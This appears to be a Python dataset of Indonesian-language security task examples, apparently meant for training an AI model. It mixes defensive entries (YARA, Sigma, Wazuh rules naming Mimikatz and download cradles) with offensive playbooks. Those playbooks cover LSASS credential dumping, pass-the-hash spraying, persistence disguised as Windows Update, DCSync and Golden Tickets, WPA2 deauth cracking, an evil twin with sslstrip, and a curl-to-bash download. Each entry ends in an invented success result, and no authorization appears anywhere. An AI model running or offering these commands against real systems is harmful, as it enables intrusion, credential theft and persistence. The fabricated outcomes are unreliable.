       "Wazuh deployed. Manager online, 12 agents connected. First alerts: brute force dari 203.x.x.x detected."),

    _e("Buat YARA rules untuk deteksi malware custom",
       ["YARA adalah tool untuk malware classification berdasarkan pattern matching",
        "rules terdiri dari: strings (hex, text, regex) dan condition",
        "berguna untuk: malware hunting, incident response, threat intelligence"],
       ["analyze malware sample", "extract unique strings", "write YARA rule", "test dan optimize"],
       ["# Extract strings dari sample",
        "strings -a malware.exe | grep -E 'http|cmd|reg|schtask|powershell'",
        "# YARA rule template",
        "cat > nexus_detection.yar << 'EOF'",
        "rule Nexus_Malware_Family {",
        "    meta:",
        "        description = 'Detects NEXUS malware family'",
        "        author = 'NEXUS SOC'",
        "    strings:",
        "        $s1 = 'svchost32.exe' ascii",
        "        $s2 = 'GlobalMalwareMutex' wide",
        "        $hex1 = { 4D 5A 90 00 03 00 00 00 }",
        "    condition:",
        "        uint16(0) == 0x5A4D and any of them",
        "}",
        "EOF",
        "# Test rule",
        "yara -r nexus_detection.yar /path/to/scan/"],
       [("yara", "malware detection via pattern matching"),
        ("strings", "extract strings dari binary")],
       "YARA rules harus specific untuk avoid false positives. Test di clean samples juga",
       "YARA condition: filesize, uint16(0)==0x5A4D (PE), all of ($s*), 2 of ($hex*)",
       "technical",
       "YARA rule created. Tested against 100 clean files: 0 FP. Against malware family: 97% detection."),

    _e("Implementasikan Zeek untuk network traffic analysis dan detection",
       ["Zeek (Bro) adalah powerful network analysis framework",
        "menghasilkan logs: conn.log, http.log, dns.log, ssl.log, files.log",
        "berguna untuk: threat hunting, forensics, anomaly detection"],
       ["deploy Zeek", "configure policies", "analyze logs", "create custom scripts"],
       ["# Install dan jalankan Zeek",
        "zeek -i eth0 local",
        "# Analyze PCAP",
        "zeek -r capture.pcap local",
        "# Check logs",
        "cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration bytes",
        "# Find beaconing",
        "cat conn.log | zeek-cut id.orig_h id.resp_h duration | awk '{print $1,$2,int($3)}' | sort | uniq -c | sort -rn | head",
        "# DNS tunneling detection",
        "cat dns.log | zeek-cut query | awk '{print length($1), $1}' | sort -rn | head -20"],
       [("zeek", "network traffic analysis framework")],
       "Zeek logs terstruktur memudahkan threat hunting. conn.log adalah starting point analisis",
       "Zeek key logs: conn (network flow), http (web traffic), dns (queries), ssl (certificates)",
       "analytical",
       "Zeek deployed on 10Gbps link. Beaconing detected: 185.x.x.x every 30s from WS-047. Escalated to IR."),

    _e("Buat Sigma rules untuk SIEM-agnostic threat detection",
       ["Sigma adalah generic signature format untuk SIEM rules",
        "satu rule bisa dikonversi ke: Splunk, Elastic, QRadar, Microsoft Sentinel",
        "berguna untuk: share threat intel, standardize detection"],
       ["identify threat behavior", "write Sigma rule", "convert to SIEM query", "deploy dan test"],
       ["# Sigma rule template",
        "cat > detect_kerberoasting.yml << 'EOF'",
        "title: Kerberoasting Activity",
        "id: 3268b746-88d8-4cd3-bffc-30077d02c787",
        "status: stable",
        "description: Detects Kerberoasting via TGS-REQ with RC4",
        "references:",
        "    - https://attack.mitre.org/techniques/T1558/003/",
        "logsource:",
        "    product: windows",
        "    service: security",
        "detection:",
        "    selection:",
        "        EventID: 4769",
        "        TicketOptions: '0x40810000'",
        "        TicketEncryptionType: '0x17'",
        "    filter:",
        "        ServiceName: '*$'",
        "    condition: selection and not filter",
        "falsepositives:",
        "    - Legacy systems using RC4",
        "level: high",
        "tags:",
        "    - attack.credential_access",
        "    - attack.t1558.003",
        "EOF",
        "# Convert to Splunk",
        "sigmac -t splunk detect_kerberoasting.yml"],
       [("sigma", "SIEM-agnostic detection rule format"),
        ("sigmac", "Sigma rule converter")],
       "Sigma rules shareable dan reusable across different SIEM platforms",
       "Sigma logsources: windows/security, linux/auth, webserver, firewall, antivirus",
       "technical",
       "Sigma rule created for Kerberoasting. Converted to Splunk query. Deployed dan tested. 0 FP in 24hr."),

    _e("Setup honeypot untuk threat intelligence dan attacker profiling",
       ["honeypot adalah sistem yang sengaja exposed untuk attract attackers",
        "tipe: low-interaction (simulate), high-interaction (real system)",
        "berguna untuk: gather TTPs, detect scanning, understand attacker behavior"],
       ["deploy honeypot", "configure monitoring", "analyze attacker behavior", "extract IOCs"],
       ["# Deploy T-Pot (multi-honeypot platform)",
        "git clone https://github.com/telekom-security/tpotce",
        "cd tpotce && ./install.sh --type=hive",
        "# Cowrie SSH honeypot",
        "pip install cowrie",
        "cowrie start",
        "# Monitor cowrie logs",
        "tail -f /home/cowrie/cowrie-git/var/log/cowrie/cowrie.json | jq '.eventid,.src_ip,.username,.password'",
        "# Extract IOCs dari honeypot",
        "cat cowrie.json | jq -r 'select(.eventid==\"cowrie.login.failed\") | .src_ip' | sort | uniq -c | sort -rn"],
       [("cowrie", "SSH/Telnet honeypot"),
        ("tpot", "multi-honeypot platform")],
       "Honeypot data sangat valuable untuk threat intel — reveal real attacker TTPs dan credentials used",
       "Honeypot types: SSH (Cowrie), HTTP (Glastopf), ICS (Conpot), multi (T-Pot)",
       "professional",
       "Honeypot active 7 days. Captured: 2,847 SSH attempts, top passwords: 123456/admin, IOCs: 234 IPs"),

    _e("Implementasikan EDR monitoring dengan custom detection rules",
       ["EDR (Endpoint Detection Response) monitor process, file, network, registry events",
        "Wazuh bisa berfungsi sebagai lightweight EDR",
        "custom rules untuk detect: process injection, suspicious commands, lateral movement"],
       ["identify detection gaps", "write custom rules", "test rules", "deploy dan monitor"],
       ["# Wazuh custom rule untuk Mimikatz",
        "cat >> /var/ossec/etc/rules/local_rules.xml << 'EOF'",
        "<rule id='100100' level='15'>",
        "  <if_group>syslog</if_group>",
        "  <regex>sekurlsa|lsadump|kerberos|privilege::debug</regex>",
        "  <description>Mimikatz activity detected</description>",
        "  <mitre><id>T1003</id></mitre>",
        "</rule>",
        "EOF",
        "# Rule untuk PowerShell download cradle",
        "# regex: DownloadString|IEX|Invoke-Expression|WebClient",
        "# Rule untuk lateral movement",
        "# regex: net use|psexec|wmic.*process.*call"],
       [("wazuh", "EDR platform dengan custom rules")],
       "Custom EDR rules butuh tuning — start broad, narrow down berdasarkan false positive rate",
       "EDR detection: process (suspicious parent-child), network (C2 beacon), file (webshell write)",
       "technical",
       "Custom Wazuh rules deployed: Mimikatz (level 15), PS download (level 12), LM (level 13). Active monitoring."),

    _e("Lakukan threat hunting untuk deteksi living-off-the-land attacks",
       ["Living-off-the-land (LOTL) = attacker pakai legitimate tools untuk avoid detection",
        "common LOTL: PowerShell, WMI, certutil, regsvr32, mshta, rundll32",
        "hunting hypothesis: attacker menggunakan Windows built-in tools untuk malicious purpose"],
       ["define hypothesis", "query SIEM untuk LOTL indicators", "analyze anomalies", "investigate positives"],
       ["# Splunk: suspicious PowerShell",
        "index=wineventlog EventCode=4104 | search ScriptBlockText IN ('*DownloadString*','*IEX*','*EncodedCommand*') | stats count by ComputerName, ScriptBlockText",
        "# WMI suspicious",
        "index=wineventlog EventCode=4688 NewProcessName='*wmiprvse*' | stats count by ParentProcessName, CommandLine",
        "# Certutil abuse",
        "index=wineventlog EventCode=4688 NewProcessName='*certutil*' CommandLine IN ('*decode*','*urlcache*','-encode*')",
        "# Regsvr32/SQUIBLYDOO",
        "index=wineventlog EventCode=4688 NewProcessName='*regsvr32*' CommandLine='*scrobj*'"],
       [("splunk", "SIEM hunting queries"),
        ("sigma", "LOTL detection rules")],
       "LOTL hunting: focus pada anomalous usage of legitimate tools, unusual parent-child relationships",
       "LOTL indicators: certutil decode/urlcache, regsvr32 /s /n /u /i, mshta http://, rundll32 javascript:",
       "analytical",
       "LOTL hunting found: certutil -urlcache -f on 3 hosts, PowerShell encoded commands on WS-089. Investigate."),

    _e("Implementasikan network segmentation dan monitoring dengan zero trust",
       ["Zero trust: 'never trust, always verify' — tidak ada implicit trust berdasarkan network location",
        "implementasi: microsegmentation, MFA everywhere, least privilege, continuous verification",
        "monitoring: east-west traffic, privileged access, anomalous connections"],
       ["assess current segmentation", "define segments", "implement firewall rules", "monitor east-west"],
       ["# List current network segments",
        "ip route show",
        "# Zeek untuk east-west monitoring",
        "zeek -i eth0 -e 'event connection_established(c: connection) { if (c$id$resp_p == 22/tcp) print c; }'",
        "# iptables segmentation rules",
        "iptables -A FORWARD -s 192.168.10.0/24 -d 192.168.20.0/24 -p tcp --dport 22 -j LOG --log-prefix 'DMZ-TO-CORP-SSH: '",
        "iptables -A FORWARD -s 192.168.10.0/24 -d 192.168.20.0/24 -j DROP"],
       [("zeek", "east-west traffic monitoring"),
        ("iptables", "network segmentation enforcement")],
       "Zero trust butuh: identity verification, device health check, least-privilege access, logging semua",
       "Microsegmentation: setiap segment hanya bisa akses apa yang truly perlu. Block east-west default",
       "professional",
       "Zero trust implementation: 5 segments defined, east-west blocked by default, 23 allow rules created."),

    _e("Setup vulnerability management program dengan automated scanning",
       ["vulnerability management: identify, classify, remediate, verify — cycle berulang",
        "tools: OpenVAS untuk scanning, Jira/ticket system untuk tracking, SLA per severity",
        "coverage: semua assets dalam inventory harus di-scan reguler"],
       ["asset inventory", "schedule scans", "triage findings", "track remediation", "verify fixes"],
       ["# OpenVAS scan",
        "gvm-cli socket --gmp-username admin --gmp-password admin --xml '<create_task><name>Weekly Scan</name><config id=\"daba56c8-73ec-11df-a475-002264764cea\"/><target id=\"TARGET_ID\"/></create_task>'",
        "# Nikto web scan",
        "nikto -h https://target.com -o nikto_results.html -Format htm",
        "# Nmap vuln scripts",
        "nmap -sV --script vuln 192.168.1.0/24 -oX vuln_scan.xml",
        "# Parse dan prioritize",
        "python3 parse_vulns.py --input vuln_scan.xml --severity critical,high"],
       [("openvas", "comprehensive vulnerability scanner"),
        ("nikto", "web vulnerability scanner"),
        ("nmap", "network vuln scanning dengan scripts")],
       "Vuln management SLA: Critical < 24hr, High < 7 days, Medium < 30 days, Low < 90 days",
       "Vuln scan frequency: Critical assets weekly, High monthly, All assets quarterly minimum",
       "structured",
       "Vuln scan complete. Critical: 3 (patch immediately), High: 12, Medium: 45. Tickets created in Jira."),

    _e("Lakukan security hardening pada Linux server sesuai CIS Benchmark",
       ["CIS Benchmarks adalah best practice security configuration guidelines",
        "Level 1: essential security, tidak impact usability",
        "Level 2: high security, mungkin impact some functionality"],
       ["audit current config", "apply CIS recommendations", "verify compliance", "document exceptions"],
       ["# Run CIS audit dengan Lynis",
        "lynis audit system --quick",
        "# Apply hardening",
        "# Disable root SSH login",
        "sed -i 's/PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config",
        "# Disable password auth (key only)",
        "sed -i 's/#PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config",
        "# Enable fail2ban",
        "apt install fail2ban && systemctl enable --now fail2ban",
        "# Audit cron jobs",
        "crontab -l && cat /etc/cron*/*",
        "# Check SUID files",
        "find / -perm -4000 -type f 2>/dev/null"],
       [("lynis", "Linux security auditing dan hardening"),
        ("fail2ban", "intrusion prevention via log monitoring")],
       "CIS hardening: SSH config, file permissions, services, logging, authentication settings",
       "Lynis score baseline: <60 = needs work, 60-80 = moderate, 80+ = good security posture",
       "professional",
       "Lynis score before: 58/100. After CIS Level 1 hardening: 79/100. SSH secured, fail2ban active."),

    _e("Implementasikan log management dan retention policy",
       ["log management: collect, normalize, store, analyze, retain logs dari semua sources",
        "log sources: OS, applications, network devices, security tools",
        "retention: compliance butuh minimum 1 tahun, security incident butuh 3+ tahun"],
       ["identify log sources", "setup centralized logging", "normalize format", "configure retention"],
       ["# Rsyslog centralized logging",
        "# Di log source:",
        "echo '*.* @@10.0.0.1:514' >> /etc/rsyslog.conf",
        "# Di log server:",
        "echo 'module(load=\"imtcp\") input(type=\"imtcp\" port=\"514\")' >> /etc/rsyslog.conf",
        "echo 'template(name=\"RemoteLog\" type=\"string\" string=\"/var/log/remote/%HOSTNAME%/%PROGRAMNAME%.log\")' >> /etc/rsyslog.conf",
        "# Log rotation",
        "cat > /etc/logrotate.d/remote << 'EOF'",
        "/var/log/remote/*/*.log {",
        "    daily",
        "    rotate 365",
        "    compress",
        "    missingok",
        "}",
        "EOF"],
       [("rsyslog", "centralized log collection"),
        ("logrotate", "log retention management")],
       "Centralized logging kritis untuk SIEM dan forensics. Tamper-proof storage mencegah log manipulation",
       "Log retention compliance: PCI-DSS 12 bulan, HIPAA 6 tahun, GDPR sesuai data retention policy",
       "technical",
       "Centralized logging: 47 sources configured. Daily volume: 2.3GB. Retention: 1 year compressed."),
]

SCAN_DATA = [
    _e("Lakukan comprehensive vulnerability scan menggunakan Nuclei dengan template terbaru",
       ["Nuclei menggunakan template YAML untuk detect berbagai vulnerability",
        "update templates reguler untuk coverage CVE terbaru",
        "categorize: teknologi detection, misconfiguration, CVE, exposure"],
       ["update templates", "scan dengan berbagai template sets", "triage findings", "document results"],
       ["# Update nuclei templates",
        "nuclei -update-templates",
        "# Scan comprehensive",
        "nuclei -l live_hosts.txt -t technologies/ -t misconfiguration/ -t cves/ -o nuclei_results.txt",
        "# Scan severity tertentu",
        "nuclei -l live_hosts.txt -severity critical,high -o critical_findings.txt",
        "# Scan untuk teknologi spesifik",
        "nuclei -l live_hosts.txt -tags apache,nginx,wordpress,joomla",
        "# Rate limiting untuk stealth",
        "nuclei -l live_hosts.txt -rl 10 -c 5 -timeout 10"],
       [("nuclei", "template-based vulnerability scanner")],
       "Nuclei -update-templates sebelum setiap engagement. Rate limit untuk avoid blocking",
       "Nuclei template categories: cves, exposures, misconfiguration, technologies, default-logins",
       "analytical",
       "Nuclei scan complete. Critical: 2 (Log4Shell, Apache Struts RCE), High: 8, Medium: 23, Info: 156"),

    _e("Lakukan web application fingerprinting dan technology detection",
       ["fingerprinting berguna untuk menentukan attack surface dan relevant CVEs",
        "tools: whatweb, wappalyzer, wafw00f untuk WAF detection",
        "informasi: web server, CMS, framework, language, CDN, WAF"],
       ["run whatweb", "detect WAF", "identify CMS", "check version information", "map attack surface"],
       ["# WhatWeb fingerprinting",
        "whatweb -a 3 https://target.com -v",
        "# WAF detection",
        "wafw00f https://target.com",
        "# HTTP headers analysis",
        "curl -I https://target.com 2>/dev/null | grep -E 'Server|X-Powered-By|X-Generator|Via'",
        "# Technology dari JS files",
        "curl -s https://target.com | grep -oE 'jquery[-.0-9]+|react[-.0-9]+|angular[-.0-9]+'",
        "# Favicon hash untuk tech identification",
        "curl -s https://target.com/favicon.ico | md5sum"],
       [("whatweb", "web technology fingerprinting"),
        ("wafw00f", "WAF detection dan fingerprinting")],
       "Fingerprinting dulu sebelum scan — hindari tools yang tidak relevan, fokus ke tech-specific vulns",
       "WAF detected: adjust payloads. Cloudflare, ModSecurity, AWS WAF butuh different bypass techniques",
       "technical",
       "Target: Apache/2.4.41 + PHP 7.4 + WordPress 5.9 + Cloudflare WAF. Attack surface: WP plugins, PHP vulns"),

    _e("Lakukan full port scan dan service enumeration dengan Nmap",
       ["nmap adalah standard tool untuk port scanning dan service fingerprinting",
        "scan type: SYN (-sS), TCP (-sT), UDP (-sU), version (-sV), script (-sC)",
        "timing: T1 (sneaky) sampai T5 (insane), default T3"],
       ["full TCP scan", "UDP scan top ports", "service version detection", "run NSE scripts"],
       ["# Full TCP scan",
        "nmap -sS -p- --open -T4 target.com -oN tcp_full.txt",
        "# Top 1000 UDP",
        "nmap -sU --top-ports 1000 target.com -oN udp_scan.txt",
        "# Version dan scripts",
        "nmap -sV -sC -p$(cat tcp_full.txt | grep open | cut -d/ -f1 | tr '\\n' ',') target.com -oN detailed.txt",
        "# Vulnerability scripts",
        "nmap --script vuln -p80,443,22,21 target.com",
        "# SMB specific",
        "nmap --script smb-vuln-ms17-010,smb-vuln-ms08-067 -p445 target.com"],
       [("nmap", "comprehensive network scanner")],
       "Nmap -p- butuh waktu tapi complete. Combine dengan -sV untuk service fingerprint",
       "Nmap NSE categories: auth, brute, default, discovery, dos, exploit, fuzzer, intrusive, vuln",
       "professional",
       "Nmap found: 22/ssh OpenSSH 8.2, 80/http Apache 2.4.41, 443/https, 3306/mysql (exposed!). MS17-010: not vuln"),

    _e("Lakukan web directory dan endpoint discovery dengan Gobuster dan ffuf",
       ["directory brute forcing menemukan hidden endpoints yang tidak ada di sitemap",
        "gobuster: fast, cocok untuk directory scan",
        "ffuf: lebih flexible, support POST fuzzing, header fuzzing, virtual host discovery"],
       ["setup wordlist", "run gobuster", "fuzz dengan ffuf", "analyze findings", "test each endpoint"],
       ["# Gobuster directory scan",
        "gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak -o dirs.txt",
        "# Gobuster DNS (subdomain)",
        "gobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt",
        "# ffuf directory",
        "ffuf -u https://target.com/FUZZ -w common.txt -mc 200,301,302,403 -o ffuf_results.json",
        "# ffuf POST parameter fuzzing",
        "ffuf -u https://target.com/login -X POST -d 'username=FUZZ&password=test' -w usernames.txt -mc 302",
        "# ffuf virtual host discovery",
        "ffuf -u https://target.com -H 'Host: FUZZ.target.com' -w subdomains.txt -mc 200"],
       [("gobuster", "directory dan DNS brute forcing"),
        ("ffuf", "flexible web fuzzing tool")],
       "SecLists adalah wordlist terbaik. ffuf lebih powerful dari gobuster untuk parameter fuzzing",
       "Key directories: /admin, /backup, /config, /api, /v1, /v2, /.git, /robots.txt, /sitemap.xml",
       "technical",
       "Found: /admin (403), /backup (200 - exposed!), /api/v2 (200), /.git (200 - git exposed!)"),

    _e("Lakukan SSL/TLS security assessment dengan testssl.sh",
       ["SSL/TLS misconfiguration sangat umum dan bisa lead ke MITM atau downgrade attacks",
        "check: protocol versions, cipher suites, certificate validity, vulnerabilities",
        "common issues: SSLv3/TLS1.0 enabled, weak ciphers, expired cert, BEAST/POODLE"],
       ["run testssl", "check protocol support", "analyze cipher suites", "check known vulns"],
       ["# Full SSL assessment",
        "testssl.sh https://target.com",
        "# Specific checks",
        "testssl.sh --protocols --ciphers --vulnerabilities target.com:443",
        "# Check for specific vulns",
        "testssl.sh --heartbleed --poodle --beast --crime target.com:443",
        "# sslyze alternative",
        "sslyze target.com --regular",
        "# Nmap SSL scripts",
        "nmap --script ssl-enum-ciphers -p443 target.com"],
       [("testssl_sh", "comprehensive SSL/TLS scanner"),
        ("sslyze", "Python-based SSL analyzer")],
       "SSL issues: TLS 1.0/1.1 deprecated, RC4/3DES weak, missing HSTS/HPKP, self-signed cert",
       "Testssl.sh output: A-F rating per category. Focus on F (critical) dan C (medium) findings",
       "analytical",
       "SSL assessment: TLS 1.0 enabled (disable), BEAST vuln (low risk), HSTS missing, cert expires in 30 days"),

    _e("Lakukan API security testing dengan systematic approach",
       ["API security testing mencakup: authentication, authorization, rate limiting, input validation",
        "tools: Postman untuk manual, Burp Suite untuk interception, ffuf untuk fuzzing",
        "OWASP API Top 10 sebagai testing checklist"],
       ["map API endpoints", "test authentication", "test authorization (IDOR)", "test rate limiting", "fuzz parameters"],
       ["# Endpoint discovery",
        "ffuf -u https://api.target.com/v1/FUZZ -w api_wordlist.txt -mc 200,401,403",
        "# Test IDOR",
        "curl https://api.target.com/v1/users/1 -H 'Authorization: Bearer USER_TOKEN'",
        "curl https://api.target.com/v1/users/2 -H 'Authorization: Bearer USER_TOKEN'",
        "# Test rate limiting",
        "for i in {1..100}; do curl -s -o /dev/null -w '%{http_code}' https://api.target.com/v1/login -d 'u=a&p=b'; done",
        "# Mass assignment test",
        "curl -X PUT https://api.target.com/v1/users/1 -d '{\"role\":\"admin\"}' -H 'Authorization: Bearer USER_TOKEN'"],
       [("burpsuite", "API interception dan testing"),
        ("ffuf", "API endpoint fuzzing")],
       "API testing: IDOR via sequential ID, mass assignment via extra fields, JWT manipulation",
       "OWASP API Top 10: BOLA, Auth, Excessive Data, BFLA, Function Level Auth, Mass Assignment",
       "professional",
       "API testing: IDOR on /users/{id}, mass assignment adds role:admin, no rate limiting on /login. Critical."),
]

POST_EXPLOIT_DATA = [
    _e("Lakukan privilege escalation di Linux menggunakan automated tools",
       ["Linux privesc vectors: SUID binaries, sudo misconfig, writable cron, kernel exploit",
        "LinPEAS adalah comprehensive privesc checker",
        "check: sudo -l, SUID files, writable paths, cron jobs, running services"],
       ["run LinPEAS", "check sudo rights", "find SUID binaries", "check cron", "exploit best vector"],
       ["# Download dan run LinPEAS",
        "curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | bash",
        "# Manual checks",
        "sudo -l",
        "find / -perm -4000 -type f 2>/dev/null | xargs ls -la",
        "cat /etc/crontab && ls -la /etc/cron*",
        "ps aux | grep root",
        "find / -writable -type f -not -path '/proc/*' 2>/dev/null | grep -v '/sys/'",
        "# GTFOBins lookup untuk SUID",
        "# https://gtfobins.github.io/"],
       [("linpeas", "automated Linux privilege escalation checker")],
       "LinPEAS highlight warna: RED = critical (test dulu), YELLOW = interesting, GREEN = good practice",
       "Linux privesc priority: sudo NOPASSWD > writable cron script > SUID GTFOBins > kernel exploit",
       "technical",
       "LinPEAS found: sudo NOPASSWD vim, SUID find binary, writable /etc/crontab script. Root via sudo vim."),

    _e("Dump credentials dari memory menggunakan Mimikatz dan alternatives",
       ["Mimikatz adalah tool untuk extract credentials dari Windows memory",
        "modern EDR block Mimikatz — gunakan alternatives: pypykatz, nanodump, lsassy",
        "target: LSASS process memory, SAM database, credential manager"],
       ["check privileges", "dump LSASS", "extract credentials", "use for lateral movement"],
       ["# Mimikatz (jika tidak ada EDR)",
        "mimikatz.exe 'privilege::debug sekurlsa::logonpasswords exit'",
        "# Pypykatz (Python, lebih stealth)",
        "pypykatz lsa minidump lsass.DMP",
        "# Dump LSASS via Task Manager atau comsvcs.dll",
        "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump <LSASS_PID> lsass.dmp full",
        "# Parse dump",
        "pypykatz lsa minidump lsass.dmp",
        "# SAM dump (local accounts)",
        "impacket-secretsdump -sam SAM -system SYSTEM LOCAL"],
       [("mimikatz", "Windows credential extraction"),
        ("pypykatz", "Python-based credential extraction"),
        ("impacket", "secretsdump untuk SAM/NTDS")],
       "LSASS dump butuh SeDebugPrivilege. Comsvcs.dll method lebih stealth dari Mimikatz direct",
       "Credential locations: LSASS (logon sessions), SAM (local), NTDS.dit (domain), Vault (saved)",
       "analytical",
       "Credential dump: 3 cleartext passwords in LSASS, 8 NTLM hashes from SAM. Domain admin hash obtained."),

    _e("Lakukan lateral movement menggunakan Pass-the-Hash dan Pass-the-Ticket",
       ["PTH menggunakan NTLM hash tanpa perlu plaintext password",
        "PTT menggunakan Kerberos ticket untuk authenticate ke services",
        "tools: impacket (psexec, wmiexec, smbexec), crackmapexec"],
       ["obtain hash atau ticket", "identify target systems", "authenticate via PTH/PTT", "execute commands"],
       ["# Pass-the-Hash dengan impacket psexec",
        "impacket-psexec CORP/administrator@10.0.0.10 -hashes aad3b435b51404ee:32196b56ffe6f45e",
        "# WMIExec (lebih stealth, tidak drop service)",
        "impacket-wmiexec CORP/administrator@10.0.0.10 -hashes :NTLM_HASH",
        "# SMBExec",
        "impacket-smbexec CORP/administrator@10.0.0.10 -hashes :NTLM_HASH",
        "# CrackMapExec untuk spray ke banyak hosts",
        "crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH --local-auth",
        "# Pass-the-Ticket",
        "impacket-getTGT CORP.LOCAL/user@10.0.0.10 -hashes :NTLM_HASH",
        "export KRB5CCNAME=user.ccache",
        "impacket-psexec -k -no-pass CORP/user@target.corp.local"],
       [("impacket", "PTH dan PTT lateral movement"),
        ("crackmapexec", "mass PTH testing")],
       "Wmiexec lebih stealth dari psexec — tidak drop binary ke disk atau create service",
       "PTH works with NTLM auth. PTT for Kerberos. Local admin hash reuse = common enterprise risk",
       "technical",
       "PTH lateral movement: psexec to 8 hosts with same local admin hash. Domain spread successful."),

    _e("Establish persistence menggunakan berbagai teknik di Windows",
       ["persistence memastikan akses tetap ada setelah reboot atau session end",
        "teknik: Registry Run Keys, Scheduled Tasks, Services, WMI Subscriptions",
        "stealth vs persistence tradeoff — pilih teknik yang sesuai risk appetite"],
       ["choose persistence technique", "implement", "verify survives reboot", "document for cleanup"],
       ["# Registry Run Key",
        "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v 'WindowsUpdate' /t REG_SZ /d 'C:\\Temp\\payload.exe' /f",
        "# Scheduled Task",
        "schtasks /create /tn 'Microsoft\\Windows\\Update\\UpdateTask' /tr 'C:\\Temp\\payload.exe' /sc daily /ru SYSTEM /f",
        "# New Service",
        "sc create 'WindowsDefenderUpdate' binPath= 'C:\\Temp\\payload.exe' start= auto",
        "# WMI Event Subscription (most stealthy)",
        "# Via PowerShell — triggers on any process start",
        "# COMHijacking untuk user-level persistence"],
       [("scheduled_tasks", "Windows persistence via schtasks"),
        ("registry", "Run key persistence")],
       "Persistence cleanup sebelum engagement end — document semua persistence untuk removal",
       "Persistence stealth ranking: WMI Sub > COMHijack > DLL Sideload > Schtask > Run Key > Service",
       "structured",
       "Persistence: schtask 'UpdateTask' SYSTEM + HKCU Run key as backup. Survived reboot test. Documented."),

    _e("Lakukan domain dominance setelah mendapatkan Domain Admin",
       ["setelah DA: dump semua credentials, establish persistent DA, Golden Ticket",
        "DCSync: replikasi domain credentials dari DC tanpa login langsung",
        "Golden Ticket: forge TGT dengan krbtgt hash — valid 10 tahun"],
       ["DCSync untuk dump semua hashes", "create Golden Ticket", "establish DA persistence", "exfil data"],
       ["# DCSync — dump semua domain hashes",
        "impacket-secretsdump CORP/administrator:'P@ssw0rd'@10.0.0.10 -just-dc",
        "impacket-secretsdump CORP/administrator:'P@ssw0rd'@10.0.0.10 -just-dc-ntlm",
        "# Mimikatz DCSync",
        "mimikatz 'lsadump::dcsync /domain:corp.local /all /csv'",
        "# Golden Ticket dengan impacket",
        "impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain CORP.LOCAL Administrator",
        "export KRB5CCNAME=Administrator.ccache",
        "impacket-psexec -k -no-pass Administrator@dc01.corp.local"],
       [("impacket", "DCSync dan ticket forgery"),
        ("mimikatz", "DCSync dan Golden Ticket")],
       "Golden Ticket valid bahkan setelah password change — kecuali krbtgt di-reset 2x",
       "Domain dominance: DCSync > NTDS.dit copy > Golden Ticket. Reset krbtgt 2x untuk mitigasi",
       "professional",
       "Domain dominance: DCSync dumped 847 hashes. Golden Ticket created (10yr validity). DA persistence set."),
]

WIRELESS_DATA = [
    _e("Lakukan WPA2 handshake capture dan offline cracking",
       ["WPA2-Personal menggunakan pre-shared key (PSK)",
        "attack: capture 4-way handshake saat client connect/reconnect",
        "offline crack dengan hashcat mode 22000 atau aircrack-ng"],
       ["enable monitor mode", "scan for targets", "capture handshake via deauth", "crack offline"],
       ["# Enable monitor mode",
        "airmon-ng check kill && airmon-ng start wlan0",
        "# Scan for targets",
        "airodump-ng wlan0mon",
        "# Capture handshake dari target AP",
        "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon",
        "# Deauth client untuk paksa re-handshake",
        "aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon",
        "# Convert untuk hashcat",
        "hcxpcapngtool -o capture.hc22000 capture.pcapng",
        "# Crack dengan hashcat",
        "hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt -r rules/best64.rule"],
       [("aircrack_ng", "WPA2 handshake capture"),
        ("hashcat", "GPU-accelerated password cracking"),
        ("aireplay_ng", "packet injection untuk deauth")],
       "Hashcat mode 22000 (PMKID + handshake) lebih modern dari mode 2500. Gunakan GPU untuk speed",
       "WPA2 crack speed: GTX 1080 ~300k/s, RTX 3090 ~1M/s. Rockyou + rules sangat efektif",
       "technical",
       "WPA2 handshake captured after 3 deauth packets. Hashcat cracked in 23min: 'OfficeWifi2024!'"),

    _e("Setup rogue AP untuk Evil Twin attack dan credential capture",
       ["Evil Twin = rogue AP dengan SSID sama seperti legitimate AP",
        "target terhubung ke rogue AP → traffic intercept atau credential capture",
        "tools: hostapd-wpe untuk WPA2-Enterprise, airbase-ng untuk Personal"],
       ["setup rogue AP", "configure DHCP", "capture traffic atau credentials", "analyze results"],
       ["# Hostapd-wpe untuk WPA2-Enterprise credential capture",
        "cat > hostapd-wpe.conf << 'EOF'",
        "interface=wlan0",
        "ssid=CORP-WiFi",
        "hw_mode=g",
        "channel=6",
        "EOF",
        "hostapd-wpe hostapd-wpe.conf",
        "# Simple rogue AP dengan airbase-ng",
        "airbase-ng -e 'FreeWiFi' -c 6 wlan0mon",
        "# Setup DHCP untuk clients",
        "dnsmasq --interface=at0 --dhcp-range=192.168.10.2,192.168.10.254,12h",
        "# Capture credentials via sslstrip",
        "sslstrip -l 8080"],
       [("hostapd_wpe", "rogue AP untuk enterprise credential capture"),
        ("airbase_ng", "simple rogue AP creation"),
        ("sslstrip", "SSL stripping untuk credential capture")],
       "Evil Twin efektif ketika: no certificate pinning, no 802.11w (PMF), client tidak verify cert",
       "WPA2-Enterprise evil twin: capture MSCHAPv2 → crack offline dengan hashcat mode 5500",
       "analytical",
       "Evil Twin: 3 clients connected to rogue AP. MSCHAPv2 captured for 2 clients. 1 cracked offline."),

    _e("Lakukan Bluetooth security assessment dan device enumeration",
       ["Bluetooth attack surface: device discovery, pairing vulnerabilities, MITM",
        "tools: hcitool, btscanner, bluesnarfer, ubertooth",
        "common attacks: BlueBorne, BIAS, BlueSmack (DoS)"],
       ["scan for bluetooth devices", "enumerate services", "test pairing security", "check vulnerabilities"],
       ["# Scan bluetooth devices",
        "hcitool scan",
        "hcitool lescan  # BLE devices",
        "# Service enumeration",
        "sdptool browse <BD_ADDR>",
        "# btscanner",
        "btscanner",
        "# L2CAP ping (DoS test)",
        "l2ping -s 600 -f <BD_ADDR>",
        "# BLE sniffing dengan ubertooth",
